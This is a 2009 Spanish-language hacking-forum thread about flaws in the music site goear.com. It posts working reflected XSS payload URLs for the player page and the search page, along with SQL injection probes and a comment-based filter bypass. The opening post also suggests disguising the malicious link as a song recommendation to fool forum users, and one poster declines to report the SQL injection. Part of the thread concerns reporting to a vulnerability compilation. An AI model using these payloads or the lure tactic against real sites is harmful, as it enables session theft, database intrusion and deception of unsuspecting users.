elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  xss en goear.com
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: xss en goear.com  (Leído 20,616 veces)
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
xss en goear.com
« en: 8 Noviembre 2009, 20:49 pm »

Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ;)')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬
En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: xss en goear.com
« Respuesta #1 en: 8 Noviembre 2009, 22:21 pm »

estaba buscando vulenrabilidad a goear cuando me vengoa l foro y ya postearon! xd!
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #2 en: 8 Noviembre 2009, 22:45 pm »

genial!, lo agregaré al recopilarorio de advisories:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_301009-t244090.0.html
En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #3 en: 9 Noviembre 2009, 01:58 am »

Ok gracias :) complemente la informacion en el post de SDC que no recordaba xD

http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265

Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden

**********
EDITO:
**********

El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas

Código:
green day"><script>alert('janito24')</script>

Lo que te llevaria a:

Código:
http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E
« Última modificación: 9 Noviembre 2009, 02:09 am por janito24 » En línea

YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #4 en: 9 Noviembre 2009, 02:17 am »

Agregale un SQLI  :P

Código
  1. http://www.goear.com/listenwin.php?v=78707c5'+and+1=1+--+
  2. http://www.goear.com/listenwin.php?v=78707c5'+and+1=2+--+
  3.  
En línea



Yo le enseñe a Kayser a usar objetos en ASM
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #5 en: 9 Noviembre 2009, 04:37 am »

a ver si podemos sacar algo de aca, nose si servira de algo:

http://www.goear.com/listenwin.php?v=%22%3E1+/**/ordEr+/**/++By+10--


adios
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #6 en: 9 Noviembre 2009, 05:30 am »

No se para que tanto  desordern en el order tan solo con el /**/ te saltas el filtro :xD Lo malo es que el Select te lo jode :xD
En línea



Yo le enseñe a Kayser a usar objetos en ASM
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #7 en: 9 Noviembre 2009, 06:46 am »

YST sería bueno que reportaras la sqli :)
 
Saludos y felicidades ;)
En línea

YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #8 en: 9 Noviembre 2009, 06:55 am »

YST sería bueno que reportaras la sqli :)

Yo no reporto nada :xD Si alguien quiere reportarlo es libre :P
En línea



Yo le enseñe a Kayser a usar objetos en ASM
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #9 en: 9 Noviembre 2009, 22:15 pm »

en goear hay un bug, realemente importante, si quieren le publico y si no se puede por mp se los dire


saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines